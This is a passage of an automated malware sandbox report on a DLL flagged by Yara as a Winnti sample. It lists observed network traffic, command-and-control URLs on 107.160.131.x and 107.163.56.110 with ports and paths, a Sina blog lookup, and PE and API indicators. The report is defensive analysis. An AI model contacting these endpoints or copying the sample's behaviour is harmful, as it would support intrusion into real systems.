Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: host123.zz.am
Source: global trafficDNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2286003527.0000000010012000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2313794874.0000000010012000.00000040.00000001.01000000.00000003.sdmp, QCTYoyX422.dllString found in binary or memory: http://107.160.131.253:18659/
Source: rundll32.exe, 00000003.00000002.4627673780.00000000026BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.253:18659//joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4629883170.000000000581F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4628998478.00000000052BD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2286003527.0000000010012000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2313794874.0000000010012000.00000040.00000001.01000000.00000003.sdmp, QCTYoyX422.dllString found in binary or memory: http://107.160.131.254:23588/article.php
Source: rundll32.exe, 00000003.00000002.4629883170.000000000581F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.php(
Source: rundll32.exe, 00000003.00000003.3322173999.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2914623696.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3405735602.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2956982462.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2671445349.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.php)
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.php.
Source: rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.php5
Source: rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.php79093
Source: rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.php;
Source: rundll32.exe, 00000003.00000002.4629115941.00000000054DA000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4628998478.00000000052BD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpC:
Source: rundll32.exe, 00000003.00000003.3322173999.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2914623696.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2631291138.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3405735602.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2956982462.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2671445349.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpD
Source: rundll32.exe, 00000003.00000003.3322173999.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2914623696.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2631291138.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3405735602.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2956982462.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2671445349.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpM
Source: rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpV
Source: rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpa
Source: rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpca)
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpgH
Source: rundll32.exe, 00000003.00000002.4629340362.0000000005780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpn
Source: rundll32.exe, 00000003.00000003.4409653699.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4418891128.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4410548228.0000000002772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpom
Source: rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpoms
Source: rundll32.exe, 00000003.00000002.4629883170.000000000581F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpr
Source: rundll32.exe, 00000003.00000002.4627673780.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phps
Source: rundll32.exe, 00000003.00000003.3322173999.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2914623696.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2631291138.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3405735602.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2956982462.0000000002772000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589818830.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2671445349.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2794061729.0000000002771000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589187962.000000000276E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.160.131.254:23588/article.phpx
Source: rundll32.exe, 00000003.00000002.4628117095.000000000427D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:1530/u1129.html
Source: rundll32.exe, 00000003.00000002.4627673780.00000000026BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: rundll32.exe, 00000003.00000002.4629883170.0000000005872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000003.00000002.4629883170.0000000005872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093;
Source: rundll32.exe, 00000003.00000002.4676120185.000000000F370000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4528987936.000000000F383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093mxQ
Source: rundll32.exe, 00000003.00000002.4676120185.000000000F370000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4528987936.000000000F383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093sx
Source: rundll32.exe, 00000003.00000003.4153225545.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4269003585.0000000005827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4255177033.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4154163648.000000000F39F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4508633067.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4421685204.000000000F39F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4482092689.000000000F371000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137774241.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137862472.000000000F371000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4419883388.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4530250085.0000000005829000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4153017629.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4255224072.000000000F39F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4253878871.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4482555446.0000000005861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4254352776.0000000005829000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4483811984.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4629883170.0000000005828000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4255321779.000000000F3A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4529433857.000000000F3A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4482092689.000000000F39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093z
Source: rundll32.exe, 00000003.00000003.4482092689.000000000F371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093zAx
Source: rundll32.exe, 00000003.00000003.4419883388.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4337930780.000000000F39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093zZ
Source: rundll32.exe, 00000003.00000003.4482092689.000000000F371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093ziyU
Source: rundll32.exe, 00000003.00000003.4421338452.0000000005827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4419680969.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4436190334.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4419045983.0000000005829000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4410091257.000000000582A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4421887562.000000000582E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093zp
Source: rundll32.exe, 00000003.00000003.4269003585.0000000005827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4436803711.0000000005827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: rundll32.exe, 00000003.00000002.4627673780.00000000026BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 00000003.00000003.4436190334.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4153017629.000000000582E000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000003.4153017629.000000000582E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?114aa32862f18
Source: rundll32.exe, 00000003.00000003.4436457039.00000000057DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4436190334.000000000582E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae49d5f3a504e
Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000003.00000003.2671535665.00000000057B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2286046646.000000001003D000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2313846298.000000001003D000.00000040.00000001.01000000.00000003.sdmp, QCTYoyX422.dllString found in binary or memory: http://www.rsac.org/ratingsv01.html
Source: rundll32.exe, 00000003.00000003.4481849158.000000000275B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/B
Source: rundll32.exe, 00000003.00000003.4481849158.000000000275B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/H
Source: rundll32.exe, 00000003.00000002.4627673780.000000000270A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/b~
Source: rundll32.exe, 00000003.00000002.4629883170.0000000005872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/576
Source: rundll32.exe, 00000003.00000003.4410548228.000000000278E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4676120185.000000000F370000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4153225545.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2589118054.0000000002787000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4255177033.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4481849158.0000000002790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4154598456.0000000002790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4410548228.0000000002790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4154163648.000000000F39F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4508633067.000000000F39C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4421685204.000000000F39F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4482092689.000000000F371000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137701960.0000000002770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137774241.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4254352776.0000000005823000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4421338452.0000000005827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4419680969.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4436190334.000000000582E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4547304955.000000000276E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4137862472.000000000F371000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4419883388.000000000F39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000003.00000003.2589118054.0000000002787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/57624790938
Source: rundll32.exe, 00000003.00000002.4676120185.000000000F370000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4528987936.000000000F383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093Ax
Source: rundll32.exe, 00000003.00000003.4254352776.0000000005823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093J
Source: rundll32.exe, 00000003.00000003.4508768955.000000000587B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4507886949.0000000005872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093m
Source: rundll32.exe, 00000003.00000003.4269003585.0000000005827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.4254352776.0000000005829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093u
Source: unknownNetwork traffic detected: HTTP traffic on port 54702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51650 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 50283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50412
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52236
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59311
Source: unknownNetwork traffic detected: HTTP traffic on port 65484 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57096
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65484
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51237
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
Source: unknownNetwork traffic detected: HTTP traffic on port 63551 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60620
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50470
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54791
Source: unknownNetwork traffic detected: HTTP traffic on port 52665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 58306 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64603 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51920
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49565
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51728
Source: unknownNetwork traffic detected: HTTP traffic on port 49565 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53480 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50555
Source: unknownNetwork traffic detected: HTTP traffic on port 62148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61403
Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
Source: unknownNetwork traffic detected: HTTP traffic on port 59311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60620 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50555 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50769
Source: unknownNetwork traffic detected: HTTP traffic on port 51059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51452
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51650
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51059
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52665
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53480
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64603
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55188
Source: unknownNetwork traffic detected: HTTP traffic on port 51920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63631 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63551
Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63631
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62148
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:50187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:58988 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:63631 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:49565 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:52236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:59311 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:61403 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:51650 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:60620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.5:49251 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: QCTYoyX422.dll, type: SAMPLEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 17.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
PE file has a writeable .text section
Source: QCTYoyX422.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10008AAD: DeviceIoControl,3_2_10008AAD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10003F63 ExitWindowsEx,3_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B2243_2_1000B224
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000B70D3_2_1000B70D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100121ED3_2_100121ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000AEC03_2_1000AEC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 305 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680
Source: QCTYoyX422.dllBinary or memory string: OriginalFilenamejscript.dllL vs QCTYoyX422.dll
Source: QCTYoyX422.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: QCTYoyX422.dll, type: SAMPLEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
